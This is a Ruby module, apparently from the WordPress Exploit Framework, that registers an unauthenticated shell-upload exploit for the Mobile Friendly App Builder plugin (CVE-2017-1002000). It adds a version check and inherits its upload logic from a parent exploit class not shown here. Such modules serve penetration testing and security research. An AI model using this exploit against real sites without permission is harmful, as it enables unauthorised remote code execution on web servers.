# frozen_string_literal: true

class Wpxf::Exploit::MobileFriendlyAppBuilderShellUpload < Wpxf::Exploit::MobileAppNativeV3ShellUpload
  def initialize
    super

    update_info(
      name: 'Mobile Friendly App Builder <= 3.0 Unauthenticated Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery and disclosure
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8771'],
        ['CVE', '2017-1002000'],
        ['URL', 'http://www.vapidlabs.com/advisory.php?v=179']
      ],
      date: 'Mar 01 2017'
    )
  end

  def check
    check_plugin_version_from_readme(plugin_name)
  end

  def plugin_name
    'mobile-friendly-app-builder-by-easytouch'
  end
end
